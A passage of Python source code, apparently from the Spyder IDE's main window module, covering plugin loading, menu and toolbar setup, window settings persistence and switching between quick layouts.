self.toolbarslist.append(self.workingdirectory.toolbar)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [self.file_switcher_action,
self.symbol_finder_action, None,
restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Third-party plugins
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
shortcuts_action = create_action(self, _("Shortcuts Summary"),
shortcut="Meta+F1",
triggered=self.show_shortcuts_dialog)
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
self.tours_menu,
MENU_SEPARATOR, trouble_action,
report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
except TypeError:
pass
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status of dockidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole.isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
self.report_missing_dependencies()
# Raise the menuBar to the top of the main window widget's stack
# (Fixes issue 3887)
self.menuBar().raise_()
self.is_setting_up = False
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += u" [DEBUG MODE %d]" % DEBUG
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# layouts are organized by columns, each colum is organized by rows
# widths have to add 1.0, height per column have to add 1.0
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout :
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
action.setChecked(widget.dockwidget.isVisible())
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout :
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout :
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
# widget.updateGeometry()
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor is to adjust height based on usefull
# estimated area in the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See issue 6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
